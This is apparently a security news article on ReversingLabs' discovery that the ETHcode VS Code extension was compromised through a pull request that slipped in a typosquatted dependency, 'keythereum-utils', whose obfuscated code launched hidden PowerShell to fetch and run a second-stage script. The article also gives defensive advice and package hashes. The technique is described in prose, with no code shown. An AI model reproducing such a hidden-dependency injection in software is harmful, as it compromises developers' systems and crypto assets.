Two-Line Code Injection in Compromised VS Code Extension Triggers Supply Chain Attack

ReversingLabs (RL) researchers have uncovered a surge in malicious packages targeting cryptocurrency users and developers.

Notably, RL’s Karlo Zanki reported on PyPI packages designed to infiltrate the Solana ecosystem, while Lucija Valentić exposed npm packages that steal crypto funds by injecting code into legitimate local packages.

These incidents highlight a growing trend: attackers increasingly use open-source repositories as delivery vehicles for malware, often relying on “typosquatting”—the practice of mimicking legitimate package names to trick unsuspecting developers into downloading malicious code.

However, these are not the only threats facing the software supply chain. More sophisticated attacks, such as those that compromised SolarWinds Orion, 3CX’s DesktopApp, and XZ Utils, involve tampering with the development pipelines of trusted projects.

These attacks can have devastating consequences, potentially impacting thousands of organizations by inserting malicious code into widely used software.

The ETHcode Compromise: A Case Study in Supply Chain Vulnerability

RL researchers recently identified a textbook example of a supply chain attack with the compromise of ETHcode, a legitimate Visual Studio Code (VS Code) extension used by Ethereum developers.

ETHcode, maintained by the 7finney GitHub organization, had nearly 6,000 installs and was considered a trusted tool for smart contract development.

Extension as shown on the marketplace

The breach began on June 17, when a newly created GitHub account, Airez299, submitted a pull request (PR) promising to modernize the codebase.

The PR appeared helpful, proposing updates and new features.

GitHub pull request comments

Both a 7finney member and GitHub’s AI reviewer examined the code, requesting only minor changes and missing the threat hidden within.

Buried among 4,000 lines of changes were just two lines that compromised the entire extension.

The first line introduced a new dependency, “keythereum-utils,” subtly named to resemble the legitimate “keythereum” library.

The second line invoked this dependency using Node.js’s “require” function, which executed heavily obfuscated code.

Upon deobfuscation, RL researchers discovered that the malicious script spawned a hidden PowerShell process to download and run a batch script from a public file-hosting service.

The full capabilities of this second-stage payload are still under investigation, but it is suspected to target crypto assets or compromise Ethereum contracts under development.

Upon discovery, RL alerted Microsoft, leading to the extension’s removal from the VS Code Marketplace on June 26.

The 7finney team quickly issued a clean update (version 0.5.1) on July 1, removing the malicious code and restoring user safety.

Lessons Learned and Steps Forward for Developers

The ETHcode incident underscores the urgent need for vigilance in software supply chains. Unlike typical typosquatting attacks, this compromise leveraged a legitimate, widely used extension and exploited the trust inherent in open-source collaboration.

The attack was facilitated by VS Code’s automatic extension updates, potentially spreading malware to thousands of developer systems.

Key takeaways for developers and teams include:

  • Manually verify contributor identities. New GitHub accounts submitting major changes should raise immediate red flags.
  • Scrutinize new dependencies. Always review files like package.json for unexpected additions and vet them through security services.
  • Leverage security tools. Platforms like RL’s Spectra Assure can flag suspicious behaviors and help compare software versions for unauthorized changes.
Spectra Assure diff showing new behaviours

RL continues to monitor the situation and share updates with the community.

The company has also launched a VS Code community on secure.software, enabling developers to query and assess suspicious extensions.

As this incident demonstrates, even trusted software can be compromised with minimal changes, making rigorous review and proactive security measures essential in defending against modern supply chain attacks.

Indicators of Compromise (IOCs):

Package NameVersionSHA1
keythereum-utils1.2.117802c834861bb983a248234b0a5d17a62fe4474
keythereum-utils1.2.20a9b47d707e167af384403af7c466eb43d46f343
keythereum-utils1.2.3442cac64cd5e7783503970c446a1d0d0a0dab69d
keythereum-utils1.2.4933967db50602a058bd1764c44fc98305866e89e
keythereum-utils1.2.5351a25bd647587aaf76bd8a303a687bb6ad79f8f
keythereum-utils1.2.7e37adafde5e03001172663256cf3d480e3765b91
Package NameVersionSHA1
7finney.ethcode0.5.08f93077e8193996fc096de359401a8e9aa6ffc7f

Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant updates

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here